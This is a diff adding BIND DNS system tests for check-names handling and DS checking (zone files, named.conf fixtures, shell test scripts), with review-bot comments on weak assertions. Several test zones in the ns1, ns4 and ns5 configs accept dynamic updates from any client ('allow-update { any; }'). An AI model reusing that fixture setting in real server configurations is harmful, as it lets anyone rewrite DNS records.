prep.example > checkds.out.$n 2>&1 || ret=1 +grep 'SHA-1.*found' checkds.out.$n > /dev/null 2>&1 || ret=1 +grep 'SHA-256.*found' checkds.out.$n > /dev/null 2>&1 || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +if [ $status = 0 ]; then $SHELL clean.sh; fi +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/checkdstool/wrong.example.dnskey.db b/bin/tests/system/checkdstool/wrong.example.dnskey.db new file mode 100644 index 0000000..cc5bfd6 --- /dev/null +++ b/bin/tests/system/checkdstool/wrong.example.dnskey.db @@ -0,0 +1,2 @@ +wrong.example. 3600 IN DNSKEY 257 3 5 AwEAAc6Cz10GXEh5lxA9ujTY/QarTajcUOBwwBYIeldjRsgoouK/UioY FYgxEFL0O5JK6YCRUoGzl3EgLr5GvNyhIp1PZpOpHf7o/4MVOZTGJzm/ sHWP5B+KcYjQOxJiDb433iCmRM4DpHPUUoxw0QbZglzAzl5MfKBoyZud lH59DdT/50bkBg8iVu35EzuW0SYt31k70hxHBSb2wAGWeqxEPKJ1nQiI UcrWNDeem7byrqjPN9wyZhq0XkQ9qbcYxAkRNd8Y7P0FyR1YKJMc6SWZ Ru7muvxqTHgCtJVgxVz4qndCFKdYidiDeKe2/X/z5gf7pyYl3549O8JR tWdNKqutppk= +wrong.example. 3600 IN DNSKEY 256 3 5 BQEAAAAB2F1v2HWzCCE9vNsKfk0K8vd4EBwizNT9KO6WYXj0oxEL4eOJ aXbax/BzPFx+3qO8B8pu8E/JjkWH0oaYz4guUyTVmT5Eelg44Vb1kssy q8W27oQ+9qNiP8Jv6zdOj0uCB/N0fxfVL3371xbednFqoECfSFDZa6Hw jU1qzveSsW0= diff --git a/bin/tests/system/checkdstool/wrong.example.ds.db b/bin/tests/system/checkdstool/wrong.example.ds.db new file mode 100644 index 0000000..d7df610 --- /dev/null +++ b/bin/tests/system/checkdstool/wrong.example.ds.db @@ -0,0 +1,2 @@ +wrong.example. 3600 IN DS 1192 5 1 684BB5119673C9272A0A7582AF8576561B5D80EC +wrong.example. 3600 IN DS 1192 5 2 14E4A873360E512CD2E8C2C331C4472F5EDAB0736669901F4D42E976 3D7B1F5C diff --git a/bin/tests/system/checknames/clean.sh b/bin/tests/system/checknames/clean.sh new file mode 100644 index 0000000..fcbd504 --- /dev/null +++ b/bin/tests/system/checknames/clean.sh 
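Review bot: The two "checking for incorrect DS" cases in checkdstool/tests.sh assert exactly what the "correct DS" cases assert: `$CHECKDS wrong.example ... || ret=1`, then greps for the bare strings `SHA-1` and `SHA-256`. As far as this hunk shows, they would still pass if the tool treated the wrong DS set as valid. If a mismatch is meant to produce a non-zero exit, the call should be inverted, as the "missing" cases already do: `$CHECKDS wrong.example > checkds.out.$n 2>&1 && ret=1`. If exit 0 is intended, a comment such as `# wrong.example: tool exits 0 here, mismatch is only visible in the output` plus a grep for the distinguishing output would show that the negative path is covered. Separately, `chmod +x $DIG` and `-D $DSFROMKEY` expand unquoted, so a build path containing spaces would break the setup before any case runs.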
@@ -0,0 +1,27 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+rm -f ns*/named.conf
+rm -f dig.out.ns?.test*
+rm -f nsupdate.out.test*
+rm -f ns1/*.example.db
+rm -f ns1/*.update.db
+rm -f ns1/*.update.db.jnl
+rm -f ns4/*.update.db
+rm -f ns4/*.update.db.jnl
+rm -f ns5/*.update.db
+rm -f ns5/*.update.db.jnl
+rm -f */named.memstats
+rm -f */named.run
+rm -f ns*/named.lock
+rm -f ns*/managed-keys.bind*
diff --git a/bin/tests/system/checknames/ns1/fail.example.db.in b/bin/tests/system/checknames/ns1/fail.example.db.in
new file mode 100644
index 0000000..c4c06c3
--- /dev/null
+++ b/bin/tests/system/checknames/ns1/fail.example.db.in
@@ -0,0 +1,17 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+@ SOA ns1.fail.example. hostmaster.fail.example. (
+ 1 3600 1200 604800 3600 )
+ NS ns1.fail.example.
+ns1.fail.example. A 10.53.0.1
+xx_xx.fail.example. A 127.0.0.1
diff --git a/bin/tests/system/checknames/ns1/fail.update.db.in b/bin/tests/system/checknames/ns1/fail.update.db.in
new file mode 100644
index 0000000..a360cfd
--- /dev/null
+++ b/bin/tests/system/checknames/ns1/fail.update.db.in
@@ -0,0 +1,16 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ SOA ns1.fail.update. hostmaster.fail.update. ( + 1 3600 1200 604800 3600 ) + NS ns1.fail.update. +ns1.fail.update. A 10.53.0.1 diff --git a/bin/tests/system/checknames/ns1/ignore.example.db.in b/bin/tests/system/checknames/ns1/ignore.example.db.in new file mode 100644 index 0000000..148fa6a --- /dev/null +++ b/bin/tests/system/checknames/ns1/ignore.example.db.in @@ -0,0 +1,18 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ SOA ns1.ignore.example. hostmaster.ignore.example. ( + 1 3600 1200 604800 3600 ) + NS ns1.ignore.example. +ns1.ignore.example. A 10.53.0.1 +yy_yy.ignore.example. A 10.53.0.1 +mx.ignore.example. MX 10 zz_zz.ignore.example. diff --git a/bin/tests/system/checknames/ns1/ignore.update.db.in b/bin/tests/system/checknames/ns1/ignore.update.db.in new file mode 100644 index 0000000..0925cef --- /dev/null +++ b/bin/tests/system/checknames/ns1/ignore.update.db.in 
@@ -0,0 +1,16 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ SOA ns1.ignore.update. hostmaster.ignore.update. ( + 1 3600 1200 604800 3600 ) + NS ns1.ignore.update. +ns1.ignore.update. A 10.53.0.1 diff --git a/bin/tests/system/checknames/ns1/named.conf.in b/bin/tests/system/checknames/ns1/named.conf.in new file mode 100644 index 0000000..a6a3a66 --- /dev/null +++ b/bin/tests/system/checknames/ns1/named.conf.in 
@@ -0,0 +1,70 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + dnssec-validation no; + notify yes; + check-integrity no; +}; + +zone "." { + type primary; + file "root.db"; +}; + +zone "ignore.example" { + type primary; + file "ignore.example.db"; + check-names ignore; +}; + +zone "warn.example" { + type primary; + file "warn.example.db"; + check-names warn; +}; + +zone "fail.example" { + type primary; + file "fail.example.db"; + check-names fail; +}; + +zone "ignore.update" { + type primary; + file "ignore.update.db"; + allow-update { any; }; + check-names ignore; +}; + +zone "warn.update" { + type primary; + file "warn.update.db"; + allow-update { any; }; + check-names warn; +}; + +zone "fail.update" { + type primary; + file "fail.update.db"; + allow-update { any; }; + check-names fail; +}; diff --git a/bin/tests/system/checknames/ns1/root.db b/bin/tests/system/checknames/ns1/root.db new file mode 100644 index 0000000..bc026a5 --- /dev/null +++ b/bin/tests/system/checknames/ns1/root.db 
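Review bot: The three `*.update` zones in ns1/named.conf.in set `allow-update { any; };`, which accepts unsigned dynamic updates from any client that can reach the listener, and nothing in the file marks this as a deliberate test-only choice. The listener is narrowed by `listen-on { 10.53.0.1; };`, so real exposure depends on how that address is configured on the test host, which this hunk does not show. A comment above the first such zone, for example `/* test fixture: unauthenticated updates are intentional; do not reuse outside the system tests */`, would keep the file from being copied as a template. The same applies to the `allow-update { any; };` zones in the ns4 and ns5 `named.conf.in` files added later in this diff.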
@@ -0,0 +1,30 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ SOA ns1. hostmaster.warn.example. ( + 1 3600 1200 604800 3600 ) + NS ns1. +ns1. A 10.53.0.1 +; +ignore.example. NS ns1.ignore.example. +ns1.ignore.example. A 10.53.0.1 +warn.example. NS ns1.warn.example. +ns1.warn.example. A 10.53.0.1 +fail.example. NS ns1.fail.example. +ns1.fail.example. A 10.53.0.1 +; +ignore.update. NS ns1.ignore.update. +ns1.ignore.update. A 10.53.0.1 +warn.update. NS ns1.warn.update. +ns1.warn.update. A 10.53.0.1 +fail.update. NS ns1.fail.update. +ns1.fail.update. A 10.53.0.1 diff --git a/bin/tests/system/checknames/ns1/warn.example.db.in b/bin/tests/system/checknames/ns1/warn.example.db.in new file mode 100644 index 0000000..7b636fd --- /dev/null +++ b/bin/tests/system/checknames/ns1/warn.example.db.in @@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ SOA ns1.warn.example. hostmaster.warn.example. ( + 1 3600 1200 604800 3600 ) + NS ns1.warn.example. +ns1.warn.example. A 10.53.0.1 +xx_xx.warn.example. A 10.53.0.1 diff --git a/bin/tests/system/checknames/ns1/warn.update.db.in b/bin/tests/system/checknames/ns1/warn.update.db.in new file mode 100644 index 0000000..9a9af97 --- /dev/null 
+++ b/bin/tests/system/checknames/ns1/warn.update.db.in @@ -0,0 +1,16 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ SOA ns1.warn.update. hostmaster.warn.update. ( + 1 3600 1200 604800 3600 ) + NS ns1.warn.update. +ns1.warn.update. A 10.53.0.1 diff --git a/bin/tests/system/checknames/ns2/named.conf.in b/bin/tests/system/checknames/ns2/named.conf.in new file mode 100644 index 0000000..3ba62e1 --- /dev/null +++ b/bin/tests/system/checknames/ns2/named.conf.in @@ -0,0 +1,31 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + check-names response warn; + notify yes; +}; + +zone "." { + type hint; + file "root.hints"; +}; diff --git a/bin/tests/system/checknames/ns2/root.hints b/bin/tests/system/checknames/ns2/root.hints new file mode 100644 index 0000000..5e89d74 --- /dev/null +++ b/bin/tests/system/checknames/ns2/root.hints 
@@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. NS ns1. +ns1. A 10.53.0.1 diff --git a/bin/tests/system/checknames/ns3/named.conf.in b/bin/tests/system/checknames/ns3/named.conf.in new file mode 100644 index 0000000..7c0cacb --- /dev/null +++ b/bin/tests/system/checknames/ns3/named.conf.in @@ -0,0 +1,31 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + check-names response fail; + notify yes; +}; + +zone "." { + type hint; + file "root.hints"; +}; diff --git a/bin/tests/system/checknames/ns3/root.hints b/bin/tests/system/checknames/ns3/root.hints new file mode 100644 index 0000000..5e89d74 --- /dev/null +++ b/bin/tests/system/checknames/ns3/root.hints 
@@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. NS ns1. +ns1. A 10.53.0.1 diff --git a/bin/tests/system/checknames/ns4/named.conf.in b/bin/tests/system/checknames/ns4/named.conf.in new file mode 100644 index 0000000..f0cb870 --- /dev/null +++ b/bin/tests/system/checknames/ns4/named.conf.in @@ -0,0 +1,44 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.4; + notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + check-names primary ignore; + check-names secondary ignore; + notify yes; +}; + +zone "." { + type hint; + file "root.hints"; +}; + +zone "primary-ignore.update" { + type primary; + file "primary-ignore.update.db"; + allow-update { any; }; +}; + +zone "master-ignore.update" { + type secondary; + primaries { 10.53.0.5; }; + file "secondary-ignore.update.db"; +}; diff --git a/bin/tests/system/checknames/ns4/primary-ignore.update.db.in b/bin/tests/system/checknames/ns4/primary-ignore.update.db.in new file mode 100644 index 0000000..b343cb1 --- /dev/null 
+++ b/bin/tests/system/checknames/ns4/primary-ignore.update.db.in @@ -0,0 +1,18 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ SOA ns4 hostmaster.ignore.update. ( + 1 3600 1200 604800 3600 ) + NS ns4 + NS ns5 +ns4 A 10.53.0.4 +ns5 A 10.53.0.5 diff --git a/bin/tests/system/checknames/ns4/root.hints b/bin/tests/system/checknames/ns4/root.hints new file mode 100644 index 0000000..5e89d74 --- /dev/null +++ b/bin/tests/system/checknames/ns4/root.hints @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. NS ns1. +ns1. A 10.53.0.1 diff --git a/bin/tests/system/checknames/ns5/master-ignore.update.db.in b/bin/tests/system/checknames/ns5/master-ignore.update.db.in new file mode 100644 index 0000000..1057248 --- /dev/null +++ b/bin/tests/system/checknames/ns5/master-ignore.update.db.in 
@@ -0,0 +1,18 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ SOA ns5. hostmaster.ignore.update. ( + 1 3600 1200 604800 3600 ) + NS ns4 + NS ns5 +ns4 A 10.53.0.4 +ns5 A 10.53.0.5 diff --git a/bin/tests/system/checknames/ns5/named.conf.in b/bin/tests/system/checknames/ns5/named.conf.in new file mode 100644 index 0000000..1797aa1 --- /dev/null +++ b/bin/tests/system/checknames/ns5/named.conf.in @@ -0,0 +1,44 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.5; + notify-source 10.53.0.5; + transfer-source 10.53.0.5; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.5; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + check-names master ignore; + check-names slave ignore; + notify yes; +}; + +zone "." { + type hint; + file "root.hints"; +}; + +zone "master-ignore.update" { + type primary; + file "master-ignore.update.db"; + allow-update { any; }; +}; + +zone "primary-ignore.update" { + type secondary; + primaries { 10.53.0.4; }; + file "primary-ignore.update.db"; +}; diff --git a/bin/tests/system/checknames/ns5/root.hints b/bin/tests/system/checknames/ns5/root.hints new file mode 100644 index 0000000..5e89d74 --- /dev/null 
+++ b/bin/tests/system/checknames/ns5/root.hints @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. NS ns1. +ns1. A 10.53.0.1 diff --git a/bin/tests/system/checknames/setup.sh b/bin/tests/system/checknames/setup.sh new file mode 100644 index 0000000..9b3fb1d --- /dev/null +++ b/bin/tests/system/checknames/setup.sh @@ -0,0 +1,35 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +$SHELL clean.sh + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf +copy_setports ns4/named.conf.in ns4/named.conf +copy_setports ns5/named.conf.in ns5/named.conf + +cp ns1/ignore.example.db.in ns1/ignore.example.db +cp ns1/warn.example.db.in ns1/warn.example.db +cp ns1/fail.example.db.in ns1/fail.example.db + +cp ns1/ignore.update.db.in ns1/ignore.update.db +cp ns1/warn.update.db.in ns1/warn.update.db +cp ns1/fail.update.db.in ns1/fail.update.db + +cp ns4/primary-ignore.update.db.in ns4/primary-ignore.update.db + +cp ns5/master-ignore.update.db.in ns5/master-ignore.update.db 
diff --git a/bin/tests/system/checknames/tests.sh b/bin/tests/system/checknames/tests.sh
new file mode 100644
index 0000000..0c36227
--- /dev/null
+++ b/bin/tests/system/checknames/tests.sh
@@ -0,0 +1,191 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 +n=1 + +DIGOPTS="+tcp +noadd +nosea +nostat +nocmd -p ${PORT}" + +wait_for_record () { + $DIG $DIGOPTS "$1" "$2" "$3" > "$4" || return 1 + grep NOERROR "$4" > /dev/null || return 1 + return 0 +} + +# Entry should exist. +echo_i "check for failure from on zone load for 'check-names fail;' ($n)" +ret=0 +$DIG $DIGOPTS fail.example. @10.53.0.1 a > dig.out.ns1.test$n || ret=1 +grep SERVFAIL dig.out.ns1.test$n > /dev/null || ret=1 +grep 'xx_xx.fail.example: bad owner name (check-names)' ns1/named.run > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +# Entry should exist. +echo_i "check for warnings from on zone load for 'check-names warn;' ($n)" +ret=0 +grep 'xx_xx.warn.example: bad owner name (check-names)' ns1/named.run > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +# Entry should not exist. +echo_i "check for warnings from on zone load for 'check-names ignore;' ($n)" +ret=1 +grep 'yy_yy.ignore.example: bad owner name (check-names)' ns1/named.run || ret=0 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +# Entry should exist +echo_i "check that 'check-names response warn;' works ($n)" +ret=0 +$DIG $DIGOPTS +noauth yy_yy.ignore.example. @10.53.0.1 a > dig.out.ns1.test$n || ret=1 +$DIG $DIGOPTS +noauth yy_yy.ignore.example. 
@10.53.0.2 a > dig.out.ns2.test$n || ret=1 +digcomp dig.out.ns1.test$n dig.out.ns2.test$n || ret=1 +grep "check-names warning yy_yy.ignore.example/A/IN" ns2/named.run > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +# Entry should exist +echo_i "check that 'check-names response (owner) fails;' works ($n)" +ret=0 +$DIG $DIGOPTS yy_yy.ignore.example. @10.53.0.1 a > dig.out.ns1.test$n || ret=1 +$DIG $DIGOPTS yy_yy.ignore.example. @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +grep NOERROR dig.out.ns1.test$n > /dev/null || ret=1 +grep REFUSED dig.out.ns3.test$n > /dev/null || ret=1 +grep "check-names failure yy_yy.ignore.example/A/IN" ns3/named.run > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +# Entry should exist +echo_i "check that 'check-names response (rdata) fails;' works ($n)" +ret=0 +$DIG $DIGOPTS mx.ignore.example. @10.53.0.1 MX > dig.out.ns1.test$n || ret=1 +$DIG $DIGOPTS mx.ignore.example. @10.53.0.3 MX > dig.out.ns3.test$n || ret=1 +grep NOERROR dig.out.ns1.test$n > /dev/null || ret=1 +grep SERVFAIL dig.out.ns3.test$n > /dev/null || ret=1 +grep "check-names failure mx.ignore.example/MX/IN" ns3/named.run > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +echo_i "check that updates to 'check-names fail;' are rejected ($n)" +ret=0 +not=1 +$NSUPDATE -d <<END > nsupdate.out.test$n 2>&1 || not=0 +check-names off +server 10.53.0.1 ${PORT} +update add xxx_xxx.fail.update. 
600 A 10.10.10.1 +send +END +if [ $not != 0 ]; then ret=1; fi +$DIG $DIGOPTS xxx_xxx.fail.update @10.53.0.1 A > dig.out.ns1.test$n || ret=1 +grep "xxx_xxx.fail.update/A: bad owner name (check-names)" ns1/named.run > /dev/null || ret=1 +grep NXDOMAIN dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +echo_i "check that updates to 'check-names warn;' succeed and are logged ($n)" +ret=0 +$NSUPDATE -d <<END > nsupdate.out.test$n 2>&1|| ret=1 +check-names off +server 10.53.0.1 ${PORT} +update add xxx_xxx.warn.update. 600 A 10.10.10.1 +send +END +$DIG $DIGOPTS xxx_xxx.warn.update @10.53.0.1 A > dig.out.ns1.test$n || ret=1 +grep "xxx_xxx.warn.update/A: bad owner name (check-names)" ns1/named.run > /dev/null || ret=1 +grep NOERROR dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +echo_i "check that updates to 'check-names ignore;' succeed and are not logged ($n)" +ret=0 +not=1 +$NSUPDATE -d <<END > nsupdate.out.test$n 2>&1 || ret=1 +check-names off +server 10.53.0.1 ${PORT} +update add xxx_xxx.ignore.update. 600 A 10.10.10.1 +send +END +grep "xxx_xxx.ignore.update/A.*(check-names)" ns1/named.run > /dev/null || not=0 +if [ $not != 0 ]; then ret=1; fi +$DIG $DIGOPTS xxx_xxx.ignore.update @10.53.0.1 A > dig.out.ns1.test$n || ret=1 +grep NOERROR dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +echo_i "check that updates to 'check-names primary ignore;' succeed and are not logged ($n)" +ret=0 +not=1 +$NSUPDATE -d <<END > nsupdate.out.test$n 2>&1 || ret=1 +check-names off +server 10.53.0.4 ${PORT} +update add xxx_xxx.primary-ignore.update. 
600 A 10.10.10.1 +send +END +grep "xxx_xxx.primary-ignore.update/A.*(check-names)" ns4/named.run > /dev/null || not=0 +if [ $not != 0 ]; then ret=1; fi +$DIG $DIGOPTS xxx_xxx.primary-ignore.update @10.53.0.4 A > dig.out.ns4.test$n || ret=1 +grep NOERROR dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +echo_i "check that updates to 'check-names master ignore;' succeed and are not logged ($n)" +ret=0 +not=1 +$NSUPDATE -d <<END > nsupdate.out.test$n 2>&1 || ret=1 +check-names off +server 10.53.0.5 ${PORT} +update add xxx_xxx.master-ignore.update. 600 A 10.10.10.1 +send +END +grep "xxx_xxx.master-ignore.update/A.*(check-names)" ns5/named.run > /dev/null || not=0 +if [ $not != 0 ]; then ret=1; fi +$DIG $DIGOPTS xxx_xxx.master-ignore.update @10.53.0.5 A > dig.out.ns5.test$n || ret=1 +grep NOERROR dig.out.ns5.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) +n=$((n+1)) + +echo_i "check that updates to 'check-names secondary ignore;' succeed and are not logged ($n)" +ret=0 +# takes a while for the transfer to succeed as ns5 (primary) is started after ns4 (secondary) +# and the zone is still loading when we get to this point. +retry_quiet 35 wait_for_record xxx_xxx.master-ignore.update @10.53.0.4 A dig.out.ns4.test$n || ret=1 +grep "xxx_xxx.master-ignore.update/A.*(check-names)" ns4/named.run > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +echo_i "check that updates to 'check-names master ignore;' succeed and are not logged ($n)" +ret=0 +retry_quiet 35 wait_for_record xxx_xxx.primary-ignore.update @10.53.0.5 A dig.out.ns5.test$n || ret=1 +grep "xxx_xxx.primary-ignore.update/A.*(check-names)" ns5/named.run > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) +n=$((n+1)) + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 
